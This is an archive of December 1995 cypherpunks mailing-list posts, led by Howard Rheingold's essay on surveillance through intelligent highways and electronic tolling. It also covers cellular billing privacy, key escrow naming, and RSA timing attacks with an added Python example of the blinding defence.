From: FringeWare Daily <email@fringeware.com>
Subject: NET - HLR on highway privacy

Sent from: hlr@well.com (Howard Rheingold)

We Need Privacy Protection On Intelligent Highways
	-- By Howard Rheingold

	Ominous steps have been taken recently, steps that perhaps move us
all closer to a global surveillance state, but few people are aware of them.
Governments around the world are installing "intelligent highways," whose
snooping capabilities ought to concern every driver.
	I recently remarked to my friend Peter, as he drove me around
Geneva, that he is scrupulous about obeying the speed limit. He told me in
reply that he had on a previous occasion received in his mailbox an envelope
containing a photograph of his automobile, the radar detector readout
superimposed, along with a notice of his fine. On key Swiss roads, radar
detectors automatically videotape speeders, computers automatically
recognize the license plate number, check it against a database, and issue
mail to the home address of the owner. It happens in Japan, too, and more
and more locations around the world.
	If my Swiss friend had not told me that story, the hair on the back
of my neck would not have started to stand up when I read, the next day, in the
October 9, 1995 edition of the International Herald Tribune, that Kansas
became the tenth state to adopt electronic toll collection. Electronic
transponders installed in vehicles automatically communicate with toll
collecting machinery via radio, and tolls are automatically deducted from
the driver's account. The following day, October 10, the same newspaper
reported that Singapore had announced contracts to wire up the road system
of the entire city-state. Singapore, never known as a bastion of civil
liberties, will be able to track the location of every vehicle, and identify
most drivers, on a minute-by-minute basis.
	 A government and private industry initiative now underway proposes
multibillion dollar investments in "Intelligent Vehicle Highway Systems"
(IVHS) in the US. These systems, combining massive numbers of embedded
sensors, video cameras, chips embedded in vehicles, and even satellite
global positioning signals, are now under construction in every
industrialized country. IVHS promise greater convenience and perhaps safety
by monitoring highway traffic, routing around jams, and automatically
collecting tolls. If these systems are not designed with the privacy of
citizens in mind, however, we might be buying a heap of surveillance
capabilities for future secret police. This is a technology policy issue
where informed groups of citizens can have an impact if we act now. It isn't
a matter of banning the technology. It's a matter of making sure today that
these systems are designed with the privacy of future citizens in mind.
	One of the best sources of information about the social impact of
IVHS comes from Professor Phil Agre at the University of California, San
Diego. Agre stated recently: "Society may decide that it wishes to provide
law enforcement with generalized abilities to track citizens' movements, but
this would clearly be a grave decision - one that should be discussed well
in advance rather than building the technical capabilities into ITS systems
with virtually no public discussion."
	There is a technical fix, however. Encryption techniques make it
possible to transmit account information from an automobile without
disclosing the identity of the owner.
	 However, it is critically important that the early majority of
transponder manufacturers build encryption capabilities into their devices.
Making privacy a standard will work far better than attempts at legislative
regulation after the market has settled on a standard.
	 Agre's reports can be found on the Web at
http://communication.ucsd.edu/pagre/rre.html. To access his
whimsically-named but extremely useful "Red Rock Eater News Service," via
e-mail send a message to rre-request@weber.ucsd.edu, Subject: archive help.
	We still have time to do something about this one. We need to ask
manufacturers now to consider the importance of building privacy protection
into their technology. I support Agre's statement that "People need to use
roads to participate in the full range of associations (educational,
political, social, religious, labor, charitable, etc) that make up a free
society.  If we turn the roads into a zone of total surveillance then we
chill that fundamental right and undermine the very foundation of freedom."
END







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Sat, 16 Dec 1995 13:09:13 +0800
To: cypherpunks@toad.com
Subject: Re: .PWL spin
In-Reply-To: <199512151829.KAA13449@jobe.shell.portal.com>
Message-ID: <30d1d41c0e04002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, anonymous-remailer@shell.portal.com said:
> 
> 
> On Sat, 9 Dec 1995, Joel McNamara wrote:
> 
> > One system administrator said the problem would have a greater effect on
> > less-secure environments, such as universities and other institutions,
> > than on corporations.
> 
> I didn't quite understand the "corporate speak" here.  It sounds like
> something coming from Bosnia or something.  It's Greek to me.
> 
> What would make a University less secure than a corporation??

1) Usually more net connected hosts.
2) Lack of adequate sysadmin attention/knowledge.
3) Vague and poorly enforced site security policies.

This is of course a generalization, but corporations seem to
have more money and time to throw at security. On the other 
hand, it's common at Universities to get a new Sun/SGI/whatever,
hook it to the net, and run it without spending a lot of time
configuring it. 

> 
> Universities (at least the ones, I've checked) have entire departments
> and theoreticians devoted to Computers ... companies usually don't.  

Just because a University has a CS department doesn't mean that it
is more secure. Even if security is an area of study, it doesn't
mean that other departments benefit from the research.

> 
> I'd think that Universities are much, much more secure environments than
> corporations are.  Doesn't Microsoft know this??  Or is this unique to
> Seattle?? 

I don't know what University sites you're referring to, my experience
has been that on the average, .edu sites are less secure than .com
sites.

-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 16 Dec 1995 04:11:37 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Pornographic stories
In-Reply-To: <Dgo5FD5w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951215135735.12467C-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995, Dr. Dimitri Vulis wrote:

> > 	In fact I've suggested to several people that we start
> > 	a dial-up uucp revival for this and related reasons.  (If
> > 	the number of users/webpages and the bandwidth usage continues
> > 	to increase at the recent rates -- without a corresponding
> > 	improvement in the infrastructure we'll probably all want to
> > 	go back to uucp for mail and news anyway.  Old fashioned dial-up
> > 	may be faster than T1 access in a few years and direct point-to-
> > 	point uucp over ISDN is probably faster already.
[...]
> > 		Anyone else want to participate in the great '90's
> > 		uucp revival?  I'm in Santa Clara and could use
> > 		some feeds and some help with the setup.
> 
> I'm all for it. My site is connected to the rest of the world via dial-up
> UUCP, I haven't touched the setup in 5 years, and am not planning to.
> 
> It might be interesting to have a variation of dial-up UUCP where site 1
> passes encrypted stuff to site 2 and doesn't quite know what site 3 they're
> supposed to go on to. Sort of like the remailers with encryption.

This definitely seems like a good idea to me, especially with the 
encrypted link.  Is the encrypted link software written, or need we hack 
a few perl scripts?

The mechanics seem simple enough....


------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Dec 1995 05:54:15 +0800
To: cypherpunks@toad.com
Subject: INT_mes
Message-ID: <199512151914.OAA04065@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The WP, Dec 15, 1995:


   Internet Mess: Return to Sender [Editorial]

   The negotiations between House and Senate conferees on the
   restriction of pornography in cyberspace have gone from bad
   to worse. A tentative accommodation arrived at last night,
   which the conferees must still vote to accept or kill,
   combines some of the worst of a broad array of misguided
   restrictions on speech, none of them likely to protect
   children.


   INT_mes



   Digital claims that its new crawler called Alta Vista, can
   find data on the World Wide Web at speeds of up to 100
   times faster than currently popular crawlers from Yahoo
   Corp., Open Text Corp. or Lycos Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 16 Dec 1995 05:00:43 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
In-Reply-To: <Pine.ULT.3.91.951214232857.10286G-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951215141513.12467E-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Rich Graves wrote:

> >Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
> >money."
> 
> I believe that was Woodward & Bernstein. They were referring to some
> right-wing wackos who had flagrantly broken the law investigating their
> political opposition, then very sloppily tried to cover it up. Woodward &
> Bernstein brought down a President. I think they're cool (though they seem
> to have rested on their laurels, and their subsequent work is less
> impressive). 

Actually, W&B attributed the line to "Deep Throat," their 
(note:cypherpunks relevance) anonymous source...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Sat, 16 Dec 1995 13:09:15 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512152023.OAA13271@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain




>> any type of billing information to the phone company.  The number is also by
>> nature unlisted and the only way to get it is by you or the cellular 
>> carrier.  If the cellular carrier gives your number out without your
>> permission or a court order they are in BIG trouble..
>
>My untrained brain sees two problems with this:
>
>1) Cellular systems are inherently less secure than standard telephones,
>as anyone who can afford a decent scanner can listen to your conversations
>at will.


I was speaking more secure in that the billing information is much harder to
get.  If someone had the time, money, and equipment to track a particular
person at a specific location making a cellular phone call from a given
number they would most likely already have the means of getting the
information an easier way.

>2) You're relying on someone other than yourself to protect your security,

I do agree that letting anyone other than yourself control your personal
information is bad!  It happens all too often.


>which is always a bad idea. Cellular carriers, Ma Bell, anyone. Does anyone
>on this list really believe that representatives of these organizations
>would think twice about bending over and spewing out everything they know
>about you? They do it all the time, without your permission and without
>valid court orders. 

At least 50% of the cellular carriers are not telco related.  Giving out
cellular numbers and names is a taboo NONO for cellular carriers.  If
cellular customers start getting sales calls from a company that received a
list from a cellular carrier, the cellular carrier is obligated to refund
the customer's bill for those calls if the customer complains because the
customer pays for calls coming or going.

I don't feel that cellular is completely private or secure but it's getting
much better with the addition of digital cellular.  The problem with digital
is that the conversations are more secure but the information about the
people calling is not.  Digital cellular and PCS offers ANI and a bunch of
other identifying information.

                                Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Sat, 16 Dec 1995 05:06:00 +0800
To: cypherpunks@toad.com
Subject: RE: ADDRESS DATABASE?
Message-ID: <199512152036.OAA13659@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>Not. As of 12/1/95, the FCC requires all cellular carriers (and IXCs for 
>that matter) to transmit ANI & CLID information, even on cellular calls. 
>BellSouth thoughtfully put a notice in my last two monthly bills, but then 
>again I think the FCC required that too.
>
>-Paul

At least I know that my cellular carrier is safe for now.  The phone company
in our area still can't handle ANI from the cellular switch.  The default
number for our carrier ends in 0000 which happens to be my number.  I get
calls every month from people with 800 numbers verifying what number this
was.  I have to explain that someone from our cellular system made a call to
their number but the bill defaults to mine.  It's no big deal since I work
for the cellular carrier though.  ;)

                        Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 16 Dec 1995 16:13:14 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: .PWL spin
In-Reply-To: <Pine.A32.3.91.951215144310.3576A-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <Pine.ULT.3.91.951215142347.14138O@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Dec 1995, Rev. Ben wrote:

> > What would make a University less secure than a corporation??
> 
> Ostensibly, universities in the interest of academic freedom and 
> promoting learning usually don't have nearly the same draconian measures 
> that corporations have.

More to the point, us poor professional staff don't stand a chance 
politically against students and faculty. We support whatever they want 
to use.

I think it's more an issue of control. Ford IS can say Thou Shalt Not
turn on SAP advertisement, and people will listen (or go away). At major
Universities, what we do with troublemakers is, we hire them.

But back to the point, the anonymous (cypherpunk relevance) "system 
administrator" (guess they couldn't find anyone willing to make a fool 
of himself on the record?) who said that Universities would be hurt more 
was wrong. We just don't have passwords on Win95 machines, or don't care 
if they're compromised. It's the people at Ford, Dow, and Sprint, 
which had wasted man-years putting together "policies" and "user 
profiles" that have proven to be worse than useless, who are pissed off. 

> Anyone want to give a  college grad a job?

Actually, yes. Low $40's (consider CA cost of living), direct user
support, but high level of freedom. You're probably overqualified,
though. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNH4PI3DXUbM57SdAQGy0QP/R/KG1cdZDru06vArZdTiO05/RRsg29Lv
lrrpoEfoLQmIktsilObBX00J/CQPd667UkfD/s1DYR8nzdsbrbZG9M3iOU5I5r/m
aDjdkBfQ1aRCfYNV+eiXen4MuuwXhWt/Hs++9bdfqiWhIIS1E3sRxK8emFIgXzm1
0o72frQsBXw=
=4EHv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sat, 16 Dec 1995 06:01:17 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: .PWL spin
In-Reply-To: <199512151829.KAA13449@jobe.shell.portal.com>
Message-ID: <Pine.A32.3.91.951215144310.3576A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> What would make a University less secure than a corporation??

Ostensibly, universities in the interest of academic freedom and 
promoting learning usually don't have nearly the same draconian measures 
that corporations have.  They don't have to worry nearly as much about 
trade secrets being mailed out the front door, or information warfare 
attacks in which a competitor is attempting to penetrate the system.

> Universities (at least the ones, I've checked) have entire departments
> and theoreticians devoted to Computers ... companies usually don't.  

And those theoreticians sit behind their desks and keep scribbling on 
their pads.  There's not much going on the ground with theory.  Plus, if 
you knew anything about theory, a lot of theory has very little immediate 
practical importance...complexity theory is good to make sure that 
one-way functions actually do exist, but in progress, there's not much 
way to implement it.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Anyone want to give a  college grad a job?  Mail me for a resume.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mphillips@CCTR.UMKC.EDU
Date: Sat, 16 Dec 1995 06:36:57 +0800
To: cypherpunks@toad.com
Subject: Apology...
Message-ID: <0099AE8C.9140398E.3@CCTR.UMKC.EDU>
MIME-Version: 1.0
Content-Type: text/plain


To all concerned:

I have received SEVERAL messages regarding a post that was sent to this
newsgroup.  I am apologizing for such a mistaken address and post.  Please
accept my sincere apology and believe me when I say that I have NEVER meant to
offend anyone.  This was a situation that WE have taken care of HERE and I hope
never happens again.  Again, please accept my apology and I hope we can
consider this subject closed. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Sat, 16 Dec 1995 17:05:29 +0800
To: cypherpunks@toad.com
Subject: Java scripts to caputure remote timing info?
Message-ID: <9512152146.AA08898@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't know enough about Java to know if it is possible, but it's something to  
think about.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Sat, 16 Dec 1995 00:28:39 +0800
To: hfinney@shell.portal.com
Subject: Re:  Blinding against Kocher's timing at
Message-ID: <95Dec15.155851gmt+0100.53765@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Hal <hfinney@shell.portal.com> wrote:

>From: ljo@ausys.se (Johansson Lars)
>> Does anyone know whether David Chaum's patent on
>> blind digital signatures extends to this application?

[Parts omitted]

>It's conceivable that Kocher's blinding would be a patentable technique
>in itself, and not impossible that he has already applied for a patent
>before publishing.  Probably he would have said so if that were his
>intention, though.

I just found this at RSA's <http://www.rsa.com/rsaqa.htm> home page:

>Q: Has RSA been "broken"?
>
>   A: No. The attack that Paul Kocher describes is academically
>   interesting, but it is easy to defend systems against his attack using a
>   technique called
>   "blinding", developed by Dr. Ron Rivest of RSA.
                          ^^^^^^^^^^^^^^^^^^^^^^^^^
When did Dr. Rivest develop this "blinding" technique?
Was it pre or post Chaum?
Perhaps Rivest himself has applied for this patent.

More info from RSA's home page:

> Another way is to use a technique called "blinding", in which a random
> number is introduced into the decryption process, making it impossible to
> get any useful data out of timing these transactions.
>
>so instead of doing the usual RSA decryption:
>
>  m = c^d mod n
>
>we perform:
>
> m = r^-1*(c*r^e)^d mod n
>
>where r is a random number, and  is its inverse.

/Lars
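
[Added example, not part of the original post or of RSA's page: the blinded decryption quoted above, m = r^-1*(c*r^e)^d mod n, worked through in Python. The toy key (two Mersenne primes), the function names and the sample message are constructed for illustration.]

```python
import math
import secrets

# Constructed toy key (an assumption of this example): two known Mersenne
# primes. Far too small for real use, and real RSA also needs padding.
P = 2**31 - 1
Q = 2**61 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent d


def decrypt_plain(c):
    """The usual RSA decryption: m = c^d mod n.

    The private-key exponentiation runs directly on the caller-supplied c,
    which is what lets an observer correlate timing with chosen inputs.
    """
    return pow(c, D, N)


def pick_blinding_factor():
    """Return a fresh random r in [2, n-1] that is invertible mod n."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def decrypt_blinded(c, r=None):
    """Blinded decryption: m = r^-1 * (c * r^e)^d mod n.

    Returns (m, blinded), where blinded is the value that was actually
    raised to d, so callers can see it is unrelated to c.
    """
    if r is None:
        r = pick_blinding_factor()
    elif math.gcd(r, N) != 1:
        raise ValueError("blinding factor must be invertible mod n")

    blinded = (c * pow(r, E, N)) % N     # c * r^e
    m_times_r = pow(blinded, D, N)       # (c * r^e)^d = c^d * r^(ed) = m * r
    m = (pow(r, -1, N) * m_times_r) % N  # strip the blinding factor
    return m, blinded


if __name__ == "__main__":
    message = 1995121512345              # constructed sample plaintext
    c = pow(message, E, N)
    print("plain   :", decrypt_plain(c))
    for _ in range(3):
        m, blinded = decrypt_blinded(c)
        print("blinded :", m, "exponentiated input:", blinded)
```

Both paths return the same m, but with blinding the input to the private-key exponentiation changes on every call and is never the attacker-chosen c.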





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Sat, 16 Dec 1995 13:08:55 +0800
To: cypherpunks@toad.com
Subject: personal privacy
Message-ID: <199512152202.QAA16464@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, as of about two days ago IL passed a bill that says employers can
listen to their workers' phone calls all they want. 

                        Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 16 Dec 1995 18:57:12 +0800
To: dan@milliways.org
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net>
Message-ID: <199512160034.QAA15353@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My AT&T 900 (or is it 9000?) MHz digital cordless phone says
the same thing. I figure it uses a weak cryptosystem. There is
something about key setup when you return the handset to the base.
	(The phone was $200, FWIW)

> 
> 
> I saw a new cordless phone made by Motorola in a retail outlet today
> that is supposedly "Secure from eavesdroppers."  I asked the
> salespeople for more technical info, but they weren't very helpful. 
> Does anyone have any information on this?  I didn't notice any "Not
> for Export" stickers on the box, and the ITAR does cover
> spread-spectrum technology.  So is it analog or digital?  Is it just
> doing simple analog tricks, or is it encrypting a bitstream?  Clipper
> maybe?  I doubt it.  Any info appreciated.
> 						Dan
> 
> ***************************************************************
> #define private public						dan@milliways.org
> Worcester Polytechnic Institute and The Restaurant at the End of the Universe
> ***************************************************************
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Sat, 16 Dec 1995 13:17:13 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: "Strongly Voluntary" Key Escrow
In-Reply-To: <199512152102.NAA27308@netcom19.netcom.com>
Message-ID: <199512160052.QAA04337@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At  9:10 12/15/95 -0500, Jim Ray wrote:
> >"Government Key Certification" might be an OK compromise-term compared
> >to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As
> >you know, I preferred the term "FUCKED," but now we must be "decent" in
> >our communications. <sigh>
> 
> I suggest Forced Key Deposit (FKD) (when some non-governmental entity e.g.
> an employer forces you to send copies of your keys to some depository), and
> Voluntary Key Deposit (VKD), when you choose to deposit a copy of your key
> with some third party.  I love the way GAK sounds, so I support it even the
> whole concept is really FUCKED.  Whenever I hear, "Government Key

	Bill,

	You may really have something here.  Let's recommend a 
	Forced Universal Cryptographic Key and Engine Depository.

	When they, naturally, build the acronym -- they'll have 
	spelled out the situation clearly <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 16 Dec 1995 08:21:12 +0800
To: jpp@software.net
Subject: Re: ADDRESS DATABASE?
Message-ID: <01HYUF22RDD08Y50QR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jpp@software.net"  "John Pettitt" 14-DEC-1995 16:34:23.37

>On the name database side the PO runs something called National Change of
Address which tracks who moved where and allows direct marketing companies to
clean their lists.  Almost everybody sells address change data (utilities,
the PO, credit companies) - I'm getting tons of "welcome to the neighbourhood"
mail since I moved.
--------------
	The basic method for getting around this is to have the mail forwarded
to a post office box. They still know you've moved, but not to where, and the
connection between your physical location (for stuff like gas bills, etcetera)
and the name & address that they did have is loosened.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gibo@ripco.com (Giles Bowkett)
Date: Sat, 16 Dec 1995 08:36:47 +0800
To: email@fringeware.com
Subject: QUERY: e-politics mailing list
Message-ID: <v01530505acf60e2e11c6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a mailing list organized around political issues
regarding electronic networks, virtual community, the changing roles of
the city and the corporation, and especially issues of class in a "wired"
world?

Much thanx, pls pardon the spam.

PS - be careful about replying to all recipients - this message went to a
couple different lists.

=========================================>>>http://pages.ripco.com/~gibo

"I drink coffee for taste only. You just can't make coffee strong enough
to compete with pharmaceutical speed, so fuck it."  --  Dave Fischer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Dec 1995 12:41:21 +0800
To: cypherpunks@toad.com
Subject: Alien Abductees, Flat Earthers, and other Fringoids
Message-ID: <acf757a608021004e632@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 12/15/95, Giles Bowkett wrote:
>Does anyone know of a mailing list organized around political issues
>regarding electronic networks, virtual community, the changing roles of
>the city and the corporation, and especially issues of class in a "wired"
>world?
>
>Much thanx, pls pardon the spam.

Don't mention it! After all, all right-thinking Cypherpunkz are intensely
interested in these mailing lists you sent this to:

abducted@hyperreal.com  (many Cypherwonks are alien abductees!)

flat-earth@zikzak.net   (where the "edge" culture meets the edge of the Earth)

email@fringeware.com  (yes, we're at the fringe)


So nice to know that we're lumped in with these folks.

--Tim "Dr. Bob" May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sat, 16 Dec 1995 11:57:03 +0800
To: cypherpunks@toad.com
Subject: Motorola Secure Phone
Message-ID: <199512152338.XAA22526@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



I saw a new cordless phone made by Motorola in a retail outlet today
that is supposedly "Secure from eavesdroppers."  I asked the
salespeople for more technical info, but they weren't very helpful. 
Does anyone have any information on this?  I didn't notice any "Not
for Export" stickers on the box, and the ITAR does cover
spread-spectrum technology.  So is it analog or digital?  Is it just
doing simple analog tricks, or is it encrypting a bitstream?  Clipper
maybe?  I doubt it.  Any info appreciated.
						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sat, 16 Dec 1995 11:57:56 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512152023.OAA13271@cdale1.midwest.net>
Message-ID: <199512160020.TAA00404@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


andr0id@midwest.net writes:
> >
> >My untrained brain sees two problems with this:
> >
> >1) Cellular systems are inherently less secure than standard telephones,
> >as anyone who can afford a decent scanner can listen to your conversations
> >at will.
> 
> I was speaking more secure in that the billing information is much harder to
> get.  If someone had the time, money, and equipment to track a particular
> person at a specific location making a cellular phone call from a given
> number they would most likely already have the means of getting the
> information an easier way.

I'm not familiar with this aspect - how do cellular services store and
make use of billing information, as opposed to traditional phone services?

> At least 50% of the cellular carriers are not telco related.  Giving out
> cellular numbers and names is a taboo NONO for cellular carriers.  If
> cellular customers start getting sales calls from a company that received a
> list from a cellular carrier, the cellular carrier is obligated to refund
> the customer's bill for those calls if the customer complains because the
> customer pays for calls coming or going.

Is this obligation incurred by the contract between the customer and the
cellular service, by statute, or otherwise? Contracts can always be
broken, and passing laws to guard the guardians generally amounts to
having the fox guard the henhouse...

> I don't feel that cellular is completely private or secure but it's getting
> much better with the addition of digital cellular.  The problem with digital
> is that the conversations are more secure but the information about the
> people calling is not.  Digital cellular and PCS offers ANI and a bunch of
> other identifying information.

This seems par for the course - the rise of ESS sounded the death knell for
traditional blue boxing. Conversion to digital makes everything easier,
including tracing. Therefore, it behooves us to recognize good and bad
aspects of technology, the better to "take what you can use, and let the
rest go by." (Ken Kesey)

(Whatever happened to Apple's bid to give away a huge chunk of the bandwidth
spectrum? Did the FCC ever get around to addressing their request? As Bill
Frezza said, *that* took cojones...)

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
   Hate, hate your enemies  save, save your friends  find, find your place
 I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 16 Dec 1995 04:40:47 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512151901.UAA10562@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sandfort-8802 unit:

>>       This took about a minute using a shabby consumer-level DB.
>>       *Now* do you get it?             ^^^^^^^^^^^^^^^^^^^^^^^^
>                                         > hint hint hint hint <
>Nope.  MY name isn't on your list.  In addition, my home phone
>number is unlisted--therefore contractually unavailable for
>resale.  *Now* do you get it?

     It's kind of cool how much faith you have in the idea that
your number is unlisted, considering the fact that you started
this thread by griping that someone had the goods on you. The
reason you were "taken aback" is because your beliefs don't
correspond to reality -- "cognitive dissonance," in the lingo.

H

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNHGg73g0mNE55u1AQEfcwH9HPcXAyMQPv9ZNQ2MxvBHfTtsIfqw15zG
n7S7yppwR2AsayZgSZQFIDoee0tLRBqEvPFhxNqnOiPCht5PK01YGA==
=gIKw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sat, 16 Dec 1995 13:39:47 +0800
To: cypherpunks@toad.com
Subject: Re: NET - HLR on highway privacy (fwd)
Message-ID: <4B9D401DA6@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 15 Dec 95 at 13:54, Jon Lasser wrote:

: I hadn't seen this cross the list yet...
: 
: ------------------------------------------------------------------------------
: Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
:           Visit my home page at http://www.goucher.edu/~jlasser/
:   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
: 
: ---------- Forwarded message ----------
: Date: Mon, 11 Dec 1995 05:59:53 -0600
: From: FringeWare Daily <email@fringeware.com>
: Subject: NET - HLR on highway privacy
: 
: Sent from: hlr@well.com (Howard Rheingold)
: 
: We Need Privacy Protection On Intelligent Highways
: 	-- By Howard Rheingold
: 
: 	Ominous steps have been taken recently, steps that perhaps move us
: all closer to a global surveillance state, but few people are aware of them.
: Governments around the world are installing "intelligent highways," whose
: snooping capabilities ought to concern every driver.

[	Much about automatic toll billing and how it can be used to track 
vehicles deleted.]

	The MTA (the people who 'run' the toll roads about Houston) have an 
automatic payment system in place that uses transponders mounted on 
windshields.  Most people who have these don't know it, but they have 
pickups for these little devices all over the freeway system, not just 
at the toll booths.

	But if you go to http://herman.tamu.edu/houston-real.html
you can get an idea of what they are able to do with the data.  And 
then they have the lobes to ask you to volunteer to put one of these 
things on your car.  What boggles the mind, is that people do...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
